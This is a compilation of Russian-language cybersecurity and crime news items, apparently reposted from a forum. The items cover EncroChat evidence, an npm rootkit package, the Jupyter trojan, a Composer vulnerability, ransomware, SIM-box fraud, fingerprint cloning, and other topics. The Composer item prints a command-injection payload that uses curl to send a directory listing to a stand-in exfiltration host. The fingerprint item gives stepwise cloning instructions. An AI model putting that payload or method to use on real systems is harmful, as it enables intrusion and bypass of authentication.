Шведский суд отменил решение об осуждении 23-летнего мужчины, обвиненного в незаконном хранении огнестрельного оружия. Обвинение было выдвинуто на основании доказательств, полученных в результате взлома EncroChat. Апелляционный суд Свеа в Стокгольме обнаружил «двусмысленность» в доказательствах, но не отклонил их полностью. Об этом сообщил ресурс ComputerWeekly.
«В приговоре четко указано, что материал, полученный в результате взлома EncroChat, не имеет никакой юридической силы», — сообщил защитник Джейкоб Асп (Jacob Asp).
Согласно французским судебным документам, сотрудники правоохранительных органов в ходе операции прослушали более 700 телефонов в Швеции, что привело к сотням расследований и громких судебных дел по всей стране. В апреле 2020 года следователи из французского подразделения по борьбе с цифровыми преступлениями проникли в зашифрованную сеть EncroChat, получив доступ к 70 млн сообщений.
Операция, поддерживаемая Европолом, привела к арестам в Великобритании, Голландии, Германии, Швеции, Франции и других странах преступников, причастных к незаконному обороту наркотиков, отмыванию денег и продаже огнестрельного оружия.
Взлом EncroChat вызвал в Швеции споры о том, следует ли использовать сообщения в EncroChat в качестве доказательства в суде. Некоторые юристы утверждают, что массовая слежка нарушает шведское законодательство.
«Понятно, что Апелляционный суд не отвергает доказательства прямо, но из вердикта ясно, что сообщения EncroChat не имеют юридической силы. На данный момент это самый критический приговор, и он просто показывает, что доказательства не выдерживают судебного разбирательства», — пояснил адвокат защиты.
По словам Аспа, приговор повлияет на будущие судебные дела, в которых будут использоваться доказательства, полученные путем взлома EncroChat.
В npm нашли интересный пакет, скрывающий руткит с открытым исходным кодом — r77. Интересно, что это первый подобный объект в репозитории, доставляющий именно руткит.
Злонамеренный пакет проходит под именем node-hide-console- windows и маскируется под легитимный — node-hide-console- window. В сущности, это классический тайпсквоттинг.
Согласно [статистике](https://npm-stat.com/charts.html?package=node-hide- console-windows), пакет с руткитом загрузили 704 раза за последние два месяца. После этого его удалили из репозитория.
Первыми на подозрительную активность [обратили внимание](https://www.reversinglabs.com/blog/r77-rootkit-typosquatting-npm- threat-research) специалисты ReversingLabs ещё в августе. По их словам, пакет «скачивал Discord-бот, помогающий установить в систему жертвы руткит r77».
Сам вредоносный код скрывался в файле index.js, который при запуске устанавливал исполняемый файл на автоматический запуск. Последний представлял собой C#-троян DiscordRAT 2.0, позволяющий управлять заражённым хостом через Discord.
Всего троян поддерживал 40 команд, среди которых есть отключение защитного софта и сбор конфиденциальных данных.
Одна из команд — «!rootkit» — используется для запуска руткита r77. Вредонос работает на уровне третьего кольца, не имеет как такового тела и предназначен для сокрытия файлов и процессов.
К слову, две разные версии пакета node-hide-console-windows также пытаются установить программу для кражи информации — [Blank- Grabber](https://www.cyfirma.com/outofband/blank-grabber-returns-with-high- evasiveness/). Причём все компоненты, которые используют киберпреступники, общедоступны и бесплатны.
Как обнаружили в Morphisec, троян Jupyter сменил маскировку и теперь распространяется под видом PDF-приложения Nitro Pro. Вредонос по-прежнему успешно скрывается от антивирусов за счет использования установщика Windows (MSI) весом более 100 Мбайт.
Написанный на .NET зловред, известный также под именами Solarmarker, Yellow Cockatoo и Polazert, объявился в интернете в прошлом году. Он нацелен в первую очередь на кражу данных из Firefox и браузеров на основе Chromium, но способен также выполнять функции бэкдора. От атак с участием Jupyter страдают в основном представители сферы здравоохранения и учебные заведения.
Изменения в цепочке доставки трояна израильские эксперты впервые заметили 8 сентября. Ранее зловред выдавал себя за Docx2Rtf или Expert PDF, а теперь маскируется под другой легитимный софт — Nitro Pro 13.
Атака, как и прежде, начинается с развертывания MSI-инсталлятора. Чтобы надежней скрыть полезную нагрузку, злоумышленники используют упаковщик Advanced Installer (в тестовой версии). С той же целью вредоносный файл выдается за документ, способный заинтересовать намеченную жертву, — например:
Запуск зловредного инсталлятора влечет исполнение PowerShell-загрузчика, встроенного в легитимную программу Nitro Pro 13. Этот скрипт, по свидетельству Morphisec, остался без изменений; он расшифровывает и загружает в память NET- модуль Jupyter.
Примечательно, что изученные образцы троянизированного приложения были подписаны сертификатами реальных компаний — TACHOPARTS Sp Z O O, FORMICA Solutions, ООО «Рувентс», ООО «Система». Новая Jupyter-кампания затронула множество крупных организаций. В настоящее время в Morphisec пытаются определить масштабы бедствия.
• Source: <https://blog.morphisec.com/new-jupyter-evasive-delivery-through- msi-installer>
Глава следственного комитета подчеркнул, что подростки ориентируются на героев компьютерных игр, которые «просто ликвидируют своего оппонента».
Александр Бастрыкин связал компьютерные игры с нападениями на образовательные
учреждения и подчеркнул: подростки решают проблемы, "ликвидируя оппонента". Об
этом Председатель СК России говорил в интервью ТАСС .
По его мнению, основные причины этого и других подобных случаев связаны с тем,
что подростки не получают достаточного уровня воспитания, культуры. "Интернет,
телевидение, социальные сети стали таким источником воспитания, который
культивирует насилие, равнодушие к проблемам сверстников, безнравственность.
Детей надо вытаскивать из интернета, а не погружать их туда за бюджетные
деньги", - заявил глава СК.
По словам Александра Бастрыкина, сегодня подростки в основном ориентируются на
героев компьютерных игр, которые "решают проблемы "просто" - ликвидируя
оппонента". Также многие блогеры ради денег создают контент, где наглядно
показывают, как они издеваются над людьми. Миллионы подростков, которые это
смотрят, могут последовать дурному примеру.
Глава СК также предложил принять дополнительные меры, чтобы защитить молодежь
"от информации, угрожающей ее благополучию, безопасности и развитию".
Источник : https://www.securitylab.ru/news/525018.php
В менеджере зависимостей Composer [выявлена](https://blog.sonarsource.com/php- supply-chain-attack-on-composer) критическая уязвимость (CVE-2021-29472), позволяющая выполнить произвольные команды в системе при обработке пакета со специально оформленным значением URL, определяющим адрес для загрузки исходных текстов. Проблема проявляется в компонентах GitDriver, SvnDriver и HgDriver, применяемых при использовании систем управления исходными текстами Git, Subversion и Mercurial. Уязвимость устранена в выпусках Composer 1.10.22 и 2.0.13.
Особо отмечается, что проблема главным образом затронула по умолчанию применяемый в Composer репозиторий пакетов Packagist, насчитывающий 306 тысяч пакетов для разработчиков на языке PHP и ежемесячно обслуживающий более 1.4 миллиарда загрузок. В ходе эксперимента показано, что в случае наличия сведений о проблеме атакующие могли бы получить контроль над инфраструктурой Packagist и перехватить учётные данные сопровождающих или перенаправить загрузку пакетов на сторонний сервер, организовав доставку вариантов пакетов с вредоносными изменениями для подстановки бэкдора в процессе установки зависимостей.
Опасность для конечных пользователей ограничивается тем, что содержимое composer.json обычно определяется самим пользователем, а ссылки на исходные тексты передаются при обращении к сторонним репозиториям, обычно заслуживающим доверия. Основной удар пришёлся на репозиторий Packagist.org и сервис Private Packagist, вызывающие Composer с передачей данных, полученных от пользователей. Злоумышленники могли выполнить свой код на серверах Packagist разместив специально оформленный пакет.
Команда Packagist устранила уязвимость в течение 12 часов после поступления сообщения об уязвимости. Исследователи в частном порядке уведомили разработчиков Packagist 22 апреля и в тот же день проблема была исправлена. Публичное обновление Composer с устранение уязвимости было опубликовано 27 апреля, а детали были [раскрыты](https://blog.sonarsource.com/php-supply- chain-attack-on-composer) 28 апреля. Аудит логов на серверах Packagist не выявил связанной с уязвимостью подозрительной активности.
Проблема вызвана ошибкой в коде проверки корректности URL в корневом файле
composer.json и ссылках для загрузки исходных текстов. Ошибка
присутствует
в коде с ноября 2011 года. В Packagist для организации загрузки кода без
привязки к конкретной системе управления исходными текстами применяются
специальные прослойки, которые выполняются при помощи вызова
"fromShellCommandline" с передачей аргументов командной строки. Например, для
git вызывается команда "git ls-remote --heads $URL", где URL обработан при
помощи метода "ProcessExecutor::escape($url)", экранирующего потенциально
опасные конструкции, такие как "$(...)" или "...
".
Суть проблемы в том, что метод ProcessExecutor::escape не экранировал последовательность "--", что позволяло указать в URL любой дополнительный параметр вызова. Подобное экранирование отсутствовало в драйверах GitDriver.php, SvnDriver.php и HgDriver.php. Атаке через GitDriver.php мешало то, что команда "git ls-remote" не поддерживала указание дополнительных аргументов после пути. Возможной оказалась атака на HgDriver.php через передачу параметра "--config" утилите "hq", позволяющего организовать выполнение любой команды через манипуляцию с настройкой "alias.identify". Например, для загрузки и выполнения кода через запуск утилиты curl можно было указать:
Code:Copy to clipboard
--config=alias.identify=!curl http://exfiltration-host.tld --data “$(ls -alh)”
Разместив в Packagist тестовый пакет с подобным URL, исследователи убедились, что после размещения на их сервер поступил HTTP-запрос с одного из серверов Packagist в AWS, содержащий листинг файлов в текущем каталоге.
Ферма в США понесла финансовый ущерб в размере $9 млн в связи с временной приостановкой работы из-за вымогательской атаки, в ходе которой неизвестная группировка получила доступ к внутренней сети фермы с помощью скомпрометированных учетных данных.
Инцидент, имевший место в январе 2021 года, является одним из примеров худших последствий вымогательских атак, приведенных Федеральным бюро расследований США в предупреждении для предприятий сельскохозяйственного сектора.
СМИ чаще всего освещают инциденты, связанные с вымогательскими атаками на местные правительства, организации в сфере здравоохранения и образования, но это не значит, что вымогатели игнорируют другие отрасли, предупреждает ФБР.
Ведомство привело несколько случаев, касающихся предприятий в сельскохозяйственной сфере, иллюстрирующих последствия небрежного отношения к кибербезопасности. В частности, в ноябре прошлого года неназванная продовольственная и сельскохозяйственная компания пострадала от вымогательской атаки, организаторы которой потребовали у нее $40 млн выкупа. К счастью, компании не пришлось платить, поскольку она смогла восстановить данные из резервных копий.
В мае 2021 года вымогатели нарушили работу американской компании по производству напитков, а в июле того же года жертвой атаки на MSP-провайдера Kaseya, затронувшей сотни организаций по всему миру, стала пекарня в США. Компания потеряла доступ к серверу, файлам и приложениям и была вынуждена приостановить операции.
В том же месяце атака, организованная вымогательской группировкой REvil, парализовала производство на объектах крупнейшего в мире поставщика мяса JBS Foods. Инцидент привел к задержкам поставок продукции в США и спровоцировал рост цен на мясо на 25%.
ФБР призвало компании в продовольственной и сельскохозяйственной сфере серьезно отнестись к угрозе вымогательских атак и инвестировать в защиту своих IT-сетей. В числе наиболее распространенных методов проникновения ведомство назвало слабо защищенные RDP-сервисы, фишинговые письма с вредоносными файлами и эксплуатацию уязвимостей в уязвимых устройствах, подключенных к интернету.
• Source: [https://s3.documentcloud.org/docume...riculture-sector-ansomware- attacks-9-1-21.pdf](https://s3.documentcloud.org/documents/21053957/fbi-tlp- white-pin-cyber-criminal-actors-targeting-food-agriculture-sector-ansomware- attacks-9-1-21.pdf)
С 10 марта 2021 года работа Twitter на территории России замедлена на 100% с мобильных устройств и на 50% со стационарных устройств по решению Роскомнадзора. Это связано с тем, что, по утверждениям представителей ведомства, «Twitter в период с 2017 года по настоящее время не удаляется контент, склоняющий несовершеннолетних к совершению самоубийств, содержащий детскую порнографию, а также информацию об использовании наркотических средств».
При этом в конце марта представители Роскомнадзора сообщали, что не дождались от руководства Twitter какого-либо ответа на замедление, и предупреждали, что в будущем ведомство и вовсе может рассмотреть возможность полной блокировки сервиса. Также в начале апреля социальную есть оштрафовали в общей сложности на 8,9 млн рублей из-за отказа удалить информацию с призывами к несовершеннолетним принять участие в несанкционированной акции.
Как теперь пишут представители ведомства, за прошедшее время социальная сеть удалила около 1900 из 3100 не удалявшихся с 2017 года запрещенных в России материалов с детской порнографией, пронаркотического и суицидального контента.
«Администрацией Twitter повышена скорость удаления запрещенных материалов. Из 650 появившихся новых ссылок на запрещенный контент удалено около 580. Среднее время удаления составляет 81 час.
В соответствии с российским законодательством на удаление запрещенной информации соцсетям отводятся 24 часа с момента получения уведомления.
Первого апреля по инициативе администрации Twitter состоялась ВКС. Вице- президент по публичной политике в Европе, на Ближнем Востоке и в Африке Twitter Inc. Шинейд МакСуинни сообщила об усилиях, предпринимаемых компанией по улучшению модерации запрещенного контента.
На вопрос представителя Twitter об условиях снятия мер по замедлению трафика соцсети в России руководством Роскомнадзора было дано разъяснение о необходимости удаления в соцсети Twitter всего запрещенного контента, приведения скорости удаления в соответствие с российским законодательством, выполнения всех норм, регулирующих деятельность соцсетей в России», — пишет Роскомнадзор.Click to expand...
В итоге в ведомстве решили не переходить к следующей мере — полной блокировке работы соцсети на территории страны, и вместо этого продлили замедление до 15 мая 2021 года. Сообщается, что «компании Twitter предоставляется дополнительное время на удаление из соцсети всего запрещенного контента и приведение своей деятельности в полное соответствие с законодательством нашей страны».
Подчеркивается, что «соблюдение российского законодательства в полном объеме позволит снять меры по замедлению трафика и исключить блокировку работы сервиса в России».
Источник: xakep.ru/2021/04/05/twitter-updates-2/
«Сотрудниками Отдела по борьбе с противоправным использованием информационно- коммуникационных технологий УМВД России по Вологодской области задержан подозреваемый в неправомерном воздействии на критическую информационную инфраструктуру Российской Федерации», – сообщила официальный представитель МВД России Ирина Волк.
По версии следствия, в прошлом году житель Вологды, являясь региональным торговым представителем сотового оператора, для выполнения плана по продажам самостоятельно осуществлял регистрацию порядка 200 сим-карт каждый месяц. При этом он использовал вымышленные паспортные данные граждан Российской Федерации и вносил недостоверные сведения об абонентах сотовой связи в информационно- телекоммуникационные сети сотового оператора.
«Злоумышленник активировал сим-карты, а затем через Интернет продавал их третьим лицам. По предварительным подсчетам, доходы от интернет-продаж могли достигать ста тысяч рублей в месяц. В дальнейшем эти абонентские номера использовались аферистами для совершения дистанционных мошенничеств. Таким образом неправомерные действия фигуранта причинили вред деловой репутации сотового оператора.
В ходе обысков полицейские изъяли носители информации, мобильные телефоны, модули сим-боксов и около шести тысяч сим-карт, в том числе незарегистрированные», – рассказала Ирина Волк.
Следователем СЧ СУ УМВД России по Вологодской области в отношении подозреваемого возбуждено уголовное дело по признакам преступления, предусмотренного частью второй статьи 274.1 УК РФ.
«В тот же день полицейские задержали еще одного местного жителя, который совершал аналогичные действия. В отношении него также принято процессуальное решение.
Сотрудники Управления по борьбе с противоправным использованием информационно- телекоммуникационных технологий ГУ МВД России по Свердловской области совместно с коллегами из регионального подразделения ФСБ России задержали двоих подозреваемых в мошенничестве в отношении владельцев банковских карт.
«По имеющимся данным, злоумышленники использовали специализированные устройства – сим-боксы – для активации учетных записей в различных мессенджерах. Вознаграждение они получали в криптовалюте.
Через эти аккаунты неустановленные лица, предположительно, проживающие на территории Украины, осуществляли звонки потерпевшим. Аферисты представлялись работниками кредитно-финансовых организаций или правоохранительных органов и заявляли, что от имени гражданина подана заявка на оформление кредита. Чтобы обезопасить сбережения, необходимо перевести их на якобы безопасный счет. Введенные в заблуждение люди выполняли указания незнакомцев и лишались денежных средств», - сообщила официальный представитель МВД России Ирина Волк.
Возбуждены уголовные дела по признакам преступления, предусмотренного статьей 159 УК РФ.
В ходе обысков по адресам проживания фигурантов изъято спецоборудование, более двух тысяч сим-карт различных операторов сотовой связи, 43 модема, банковские карты, сотовые телефоны и другие предметы, имеющие доказательственное значение.
«Задержанные признали свою вину и раскаялись в содеянном, пояснив следователям, что осознавали, для каких целей использовали современные технические устройства. В отношении них избрана мера процессуального принуждения в виде обязательства о явке. Предварительное расследование продолжается», - отметила Ирина Волк.
Он должен решить проблемы с поисковым движком Twitter, а также убрать всплывающее окно авторизации.
Илон Маск пригласил работать в Twitter известного хакера Джорджа Фрэнсис Хотца. В Интернете Хотц известен под ником Geohot. Хакер в свое время прославился созданием первого в мире джейлбрейка для iPhone и обошёл защиту консолей Sony. Он также основал стартап Comma.ai, где разрабатывается система автопилота для машин.
16 ноября Хотц написал в Twitter, что поддерживает решения Маска насчёт «хардкорного режима работы». После завершения сделки по покупке, Маск сократил штат сотрудников с 7500 до примерно 2750 человек. Под сокращение попали те, кто оказался не готов к «ежедневной многочасовой интенсивной работе» и в целом был не согласен с новой политикой руководства.
Джордж также заявил, что готов на стажировку в Twitter с минимальной оплатой, которая равна прожиточному минимуму в Сан-Франциско. Маск ответил и пригласил разработчика в Twitter.
Перед хакером поставлено две основные задачи в рамках его 12-недельного испытательного срока: решить проблемы с поисковым движком Twitter, а также убрать всплывающее окно авторизации, которое не позволяет использовать поиск по социальной сети без входа в учётную запись пользователя.
source:
twitter.com/realGeorgeHotz/status/1592945472519680001
twitter.com/elonmusk/status/1592976585858351105
Как хакеры «заказывают» друг друга.
21-летний мужчина из Нью-Джерси был арестован и обвинен в нападениях в ходе расследования деятельности групп киберпреступников, которые мстят врагам, нанимая людей для физических атак на своих соперников.
Прокуроры обвиняют мужчину в участии в нескольких атаках, включая стрельбу из пистолета по дому и поджог жилого дома с помощью коктейля Молотова.
Патрик Макговерн-Аллен был арестован ФБР 12 августа. По данным ФБР, Аллен был частью группы сообщников, которые действуют по схеме принуждения и запугивания, все чаще используемой конкурирующими киберпреступными группировками.
Макговерн-Аллен и неустановленный сообщник произвели не менее 8 выстрелов из пистолета по жилому дому в штате Пенсильвания. Никто из жителей дома не пострадал.
Также 18 декабря 2021 года в другом доме в Пенсильвании случился пожар. Преступники разбили окно и бросили зажигательную смесь в дом. В уголовном иске говорится, что на обоих преступлениях присутствовал один и тот же подозреваемый. ФБР заявило, что обе жертвы нападений были объектами предыдущих преследований со стороны конкурирующих групп киберпреступников. Кроме того, ряд предыдущих инцидентов оборачивались смертельными исходами других людей.
Такие «локальные» атаки становятся все более распространенными в определенных киберпреступных сообществах, особенно в тех, которые занимаются подменой SIM- карт, чтобы захватить номер телефона жертвы и использовать его для получения контроля над ее аккаунтами в Интернете.
В ходе расследования выяснилось, что обе атаки были мотивированы желанием отомстить киберпреступнику-сопернику, напав на его друзей. Стрелявшие в дом в Пенсильвании кричали: «Здесь был Джастин Актив!».
Джастин Актив — это прозвище человека, который состоит в тех же киберпреступных каналах, что и нападавшие. По его словам, жертвой стрельбы была его бывшая девушка, а целью зажигательной бомбы был его друг. Джастин Актив утверждал, что Макговерн-Аллен несет ответственность за оба нападения, говоря, что они были задуманы как тактика запугивания против него.
Такие атаки начинаются с преступных Telegram-каналов с сотнями и тысячами участников, которые содержат «предложения о работе», представляющие собой задания бросить кирпич в окно или проколоть шины врагов. За некоторые услуги заказчики готовы платить около $3000.
[](https://www.securitylab.ru/upload/images/content- img(402).png)
[](https://www.securitylab.ru/upload/images/content- img(403).png)
Макговерн-Аллен в данный момент находится остается в СИЗО в Филадельфии. Его интересы представляет адвокат, который отказался от каких-либо комментариев по поводу уголовного дела .
Многие из «заказчиков» атак являются частыми участниками нескольких Telegram- каналов, посвященных исключительно деятельности по обмену SIM-картами. В результате большинство жертв заказных нападений являются другими киберпреступниками, причастными к преступлениям с подменой SIM-карт.
source: storage.courtlistener.com/recap/gov.uscourts.paed.599644/gov.uscourts.paed.599644.1.0.pdf
Исследователи безопасности из криптовалютной биржи Kraken [продемонстрировали](https://blog.kraken.com/post/11905/your-fingerprint-can- be-hacked-for-5-heres-how/) простой и дешёвый способ для создания клона отпечатка пальца по фотографии при помощи обычного лазерного принтера, столярного клея и подручных средств. Отмечается, что полученный слепок позволил обойти защиту биометрической аутентификации по отпечатку пальца и разблокировать имеющиеся у исследователей планшет iPad, ноутбук MacBook Pro и аппаратный криптовалютный кошелёк.
Методы воссоздания отпечатков пальцев известны уже давно, но они, как правило, требовали специальных навыков или наличия дорогого оборудования, такого как 3D-принтер. Стоимость создания клона в предложенном методе укладывается приблизительно в 5 долларов. На первом этапе обычным смартфоном фотографируется отпечаток, оставленный на любой гладкой поверхности, например, на глянцевом экране/крышке ноутбука или смартфона.
Затем в любом графическом редакторе выполняется операция повышения контраста папиллярного узора, создания негатива, кадрирования и преобразования изображения в чёрно-белый формат. После этого подготовленное изображение печатается на типовом лазерном принтере, но вместо бумаги используется aцетатный лист - прозрачная плёнка, применяемая для изготовления трафаретов, наклеек и карточек. В процессе вывода на печать тонер образует на ацетатном листе фактурные выпуклые бороздки, повторяющие папиллярный узор.
На последнем этапе на плёнку наносится тонкий слой столярного клея, который после высыхания образует эластичную субстанцию повторяющую объёмный папиллярный узор. Поместив полученную плёнку на палец оказалось возможным разблокировать большинство протестированных систем биометрической проверки по отпечаткам пальцев.
Сотрудники правоохранительных органов Испании арестовали 45 человек по подозрению в участии в мошеннической группировке, управлявшей двумя десятками сайтов и обманувшими как минимум 200 человек на 1,5 млн евро.
На прошлых выходных полиция провела одновременные обыски в нескольких испанских провинциях. Обыски стали результатом продолжительного расследования, начавшегося еще в июле 2019 года.
Злоумышленники создали как минимум 20 отдельных мошеннических web-порталов, где предлагали потребительскую электронику по очень низкой цене. После оплаты покупки жертвой деньги отправлялись на счета других жертв, которых мошенники насильно превратили в своих "денежных мулов".
С помощью данных, указанных покупателем при заказе товара, злоумышленники связывались с ним и сообщали, что он стал жертвой мошенников. Далее они заявляли, будто единственный способ вернуть деньги - стать "денежным мулом".
Жертв принуждали к открытию нового банковского счета и получению "чистых" кредитных карт, которые затем нужно было отправлять на различные абонентские ящики в Бенине. Деньги затем обналичивались в банкоматах Бенина.
В некоторых случаях "денежные мулы" оставались довольны своими комиссионными и уже добровольно продолжали открывать новые счета для мошенников.
В случаях, когда жертвы оказывались не столь сговорчивыми, злоумышленники угрожали им убийством или предоставляли поддельные документы, по которым они якобы являются кредиторами, и все операции проходят в соответствии с законом.
Помимо мошеннических интернет-магазинов электроники злоумышленники проворачивали еще одну схему - размещали в Сети и соцсетях рекламу кредитной организации. Выдавая себя за финансистов из Франции, мошенники предлагали кредиты. Они просили у заемщиков небольшой депозит, якобы для покрытия комиссионных за подачу заявки на получение кредита и соответствующих расходов.
Сумма депозита составляла 500-1000 евро, и как минимум 200 человек отправили эти деньги мошенникам в надежде взять кредит.
Помимо депозита, жертвам также предлагалось получить новую кредитную карту и отправить ее в Бенин вместе с соответствующими учетными данными online- банкинга.
По данным испанских правоохранительных органов, мошенническая группировка тесно связана с другими такими же группировками в Германии, Австрии, Франции и Польше, поэтому они продолжат сотрудничество с Интерполом и Европолом.
• Source: https://www.policia.es/_es/comunicacion_prensa_detalle.php?ID=10281
+++++
Под судом старики, через чьи счета прошли миллиарды наркоевро
Все обвиняемые находятся в состоянии шока. Полиция Испании задержала 135 человек, в том числе шестерых пенсионеров в возрасте от 80 лет и старше. Всех их обвиняют в отмывании денег, полученных от продажи наркотических средств.
Но следователи уверены, что сами старики вряд ли знали о том, что происходило на их банковских счетах.
— Пенсионеров нанял на работу адвокат Хуан Рамон Гарсиа Креспо, он сейчас обвиняется в пособничестве крупному наркоторговцу, — сообщили стражи порядка. – Большинство стариков проживало в домах престарелых, все они жили очень скромно.
Ежемесячная пенсия 84-летнего Хенаро составляет всего €286. Но по бумагам мужчина является владельцем 44 банковских счетов. Его имя фигурирует в организационной структуре 25 компаний, уставной капитал одной из них составляет €3,5 миллионов. Также, согласно бумагам, Хенаро владеет 28 объектами недвижимости – жилыми домами, парковочными местами и торговыми площадями в самых дорогих кварталах Мадрида.
Собрата по несчастью Хенаро, 80-летнего Хосе Луиса обвиняют в отмывании €314 тысяч. Во время допроса он признался, что действительно ходил вместе с адвокатом к нотариусу, подписывал какие-то бумаги, в смысл которых не вдавался. За это ему заплатили €100.
Все обвиняемые находятся в состоянии шока не только от новости о формально принадлежащих им богатствах, но и от осознания того, с кем им пришлось иметь дело. Хуан Рамон Гарсиа Креспо – один из главных участников дела о незаконном обороте наркотиков и связям с наркодельцами в Колумбии и Португалии, его имя также проходит по другому делу, о торговле людьми.
Компания Facebook [объявила](https://about.fb.com/news/2021/11/update-on-use- of-face-recognition/), что более не будет использовать систему распознавания лиц (Face Recognition) на своей платформе и удалит соответствующие профили, созданные ранее для миллиарда человек.
Система Face Recognition анализировала фотографии, сделанные отмеченными пользователями, и фотографии профилей связанных с ними пользователей, чтобы создать уникальный шаблон. Затем этот шаблон использовался для идентификации пользователей на других загруженных фотографиях, а также автоматических тегов в Memories.
Теперь, через неделю после своего ребрендинга в Meta, Facebook объявила, что отказывается от функции распознавания лиц и удалит шаблоны, созданные системой.
На прошлой неделе социальная сеть сообщила о ребрендинге своей материнской
компании, которая отныне будет называться Meta. Это название вдохновлено
романом Нила Стивенсона «Лавина», где Метавселенной называется виртуальная
реальность, охватывающая весь мир.
Смена названия произошла на фоне недавней утечки внутренних документов
Facebook, которые продемонстрировали ее многочисленные этические проблемы. В
частности, выяснилось, что компания знала о последствиях, возникающих при
использовании ее платформы, включая
[распространение](https://www.nbcnews.com/tech/tech-news/facebook-knew-
radicalized-users-rcna3581) радикализирующей дезинформации, а также негативные
последствия для психического здоровья [подростков-
пользователей](https://www.wsj.com/articles/facebook-knows-instagram-is-toxic-
for-teen-girls-company-documents-show-11631620739).
Марк Цукерберг заявил, что компания готова меняться и в будущем удвоит усилия
по созданию иммерсивного виртуального опыта.
«Многие конкретные случаи, когда распознавание лиц может быть полезным, необходимо сопоставлять с растущими опасениями по поводу использования этой технологии в целом, —пишет Джером Пезенти, вице-президент компании по искусственному интеллекту. — Существует много опасений о том, какое место должна занимать технология распознавания лиц в обществе, и регулирующие органы все еще находятся в процессе разработки четкого набора правил, регулирующих ее использование. В условиях продолжающейся неопределенности мы считаем целесообразным ограничение использования распознавания лиц узким набором сценариев использования».
Click to expand...
Дело в том, что Facebook уже сталкивалась с юридическими последствиями подобных «опасений». Так, недавно компания [выплатила](https://www.chicagotribune.com/business/ct-prem-biz-facebook- privacy-settlement-delay-appeal-20210405-fydkqfwkrfew7jc6koe2rbmndy- story.html) 650 миллионов долларов в связи с коллективным судебным иском в штате Иллинойс, где утверждалось, что социальная сеть собирала и хранила биометрические данные пользователей без их согласия.
Защитник конфиденциальности и приватности, а также ИБ-исследователи уже хвалят Facebook за отказ от распознавания лиц.
Facebook has announced they will be deleting over a billion face recognition templates as they shut down their entire face recognition system. This is great news for Facebook users, and for the global movement pushing back on this technology. https://t.co/0ErdCBhkCThttps://t.co/0ErdCBhkCT
Click to expand...
Миллионы настольных, портативных и планшетных компьютеров Dell оказались уязвимы перед проблемой в драйвере Dell DBUtil (драйвер Dell BIOS, который позволяет ОС и системным приложениям взаимодействовать с BIOS и железом), которая появилась в коде еще 12 лет назад.
Старый баг в составе DBUtil версии 2.3 (dbutil_2_3.sys) обнаружили специалисты компании SentinelOne, и он получил идентификатор CVE-2021-21551. Этот драйвер устанавливается на устройство в случае использования одной из следующих утилит: Dell Command Update, Dell Update, Alienware Update, Dell System Inventory Agent и Dell Platform Tags. По мнению исследователей, в настоящее время драйвер присутствует на сотнях миллионов девайсов, поставляемых Dell с 2009 года.
Найденная специалистами проблема позволяет злоумышленнику получить доступ к функциям драйвера и выполнить вредоносный код с привилегиями уровня SYSTEM и ядра. К счастью, уязвимость нельзя использовать удаленно, но при помощи этой проблемы атакующий, уже имеющий доступ к системе жертвы, сможет повысить свои привилегии. Демонстрацию такой атаки можно увидеть ниже.
В начале июня SentinelOne планирует опубликовать PoC-эксплоит для CVE-2021-21551. Пока этого не произошло, эксперты настоятельно рекомендуют системным администраторам и пользователям обновить Dell DBUtil.
Источник: xakep.ru/2021/05/05/dbutil-bug/
Аналитики CertiK Alert сообщили о взломе DeFi-платформы Alex Labs в сети биткоина. Убытки составили около $4,3 млн.
__https://twitter.com/x/status/1790432967422083329
Эксперты подозревают возможную утечку закрытых ключей.
Согласно ончейн- данным, инцидент произошел после обновлений контракта платформы Bridge Endpoint в BNB Chain. После этого неизвестный вывел из моста протокола 16 BTC, 3,3 млн USDC и 2,7 млн Sugar Kingdom Odyssey (SKO).
Вызов операции обновления фактически изменил адрес реализации на непроверенный байт-код, сделав это изменение незаметным на первый взгляд.
Адрес хакера создал два непроверенных контракта 10 мая и еще два 14 мая. До этого активности кошелька не наблюдалось.
После начала обновлений прокси-адрес мостового контракта вызвал непроверенную функцию другой учетной записи, в результате чего средства ушли на кошелек преступника.
По мнению аналитиков, не исключено, что злоумышленник пытался атаковать протокол в других сетях, поскольку обновления контракта Alex Labs также инициировали в Ethereum.
Представители DeFi-проекта подтвердили взлом моста XLink. Команда сообщила о сотрудничестве с многими биржами и успешной заморозке части украденных средств.
__https://twitter.com/x/status/1790611871986331855
В Alex Labs также добавили, что уже идентифицировали личность взломщика и предложили ему до 18 мая вернуть активы за вознаграждение в 10%.
Сотрудниками Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий МВД России совместно с коллегами из Челябинской области пресечена противоправная деятельность организованной группы. Злоумышленники специализировались на обналичивании и выводе за рубеж денежных средств, похищенных в результате противоправной деятельности.
«По имеющимся данным, сообщники организовали изготовление поддельных паспортов и иных документов, удостоверяющих личность граждан Российской Федерации, Республики Беларусь и Киргизской Республики. Затем соучастники представили их в офисы крупнейших российских кредитных организаций и оформили банковские карты. Впоследствии эти средства платежей использовались для вывода и обналичивания денежных средств, полученных преступным путем», – рассказала официальный представитель МВД России Ирина Волк.
В Челябинске полицейские задержали одиннадцать подозреваемых. По адресам их проживания изъяты компьютерные системные блоки, внешние электронные носители информации, банковские и сим-карты, документы с признаками подделки, бланки миграционных карт. Кроме того, обнаружены мобильные телефоны, содержащие компьютерные программы, предназначенные для неправомерного осуществления приема, выдачи, перевода денежных средств, ежедневники, а также другие предметы, имеющие доказательственное значение.
«Следователем ГСУ ГУ МВД России по Челябинской области возбуждены уголовные дела по признакам преступлений, предусмотренных статьями 327 и 187 УК РФ. В соответствии с ролью каждого фигурантам предъявлены обвинения и избраны меры пресечения в виде заключения под стражу или подписки о невыезде и надлежащем поведении», – сообщила Ирина Волк.
Центр по исследованию коррупции и организованной преступности (OCCRP) обвинил
президента Сальвадора в ненадлежащем использовании средств для реализации
проектов, связанных с легализованной как средство платежа криптовалютой.
Специалисты OCCRP утверждают, что правительство Сальвадора использовало
кредит, полученный от Центрального американского банка экономической
интеграции (CABEI), для финансирования процедур по легализации биткоина.
Кредит на сумму $600 млн, предоставленный в 2021 году, был предназначен для
поддержки малых и средних предприятий, чтобы помочь им оправиться от пандемии
COVID-19. Однако лишь $20 млн из $600 млн кредитных средств были использованы
по назначению, утверждает OCCRP.
В бюджетных документах указано, что $425 млн были выделены на реализацию «общих государственных обязательств». OCCRP установил, что более $200 млн из этих $425 млн были выделены Сальвадору для легализации биткоина. В июне 2021 года президент CABEI Данте Мосси (Dante Mossi) заявил, что организация готова помочь стране в этом начинании. Но уже в начале 2023 года Мосси [заявил](https://bits.media/predsedatel-cabei-bitkoin-ne-silno-populyaren- sredi-salvadortsev/), что местные граждане не слишком заинтересованы использовать биткоин как платежное средство.
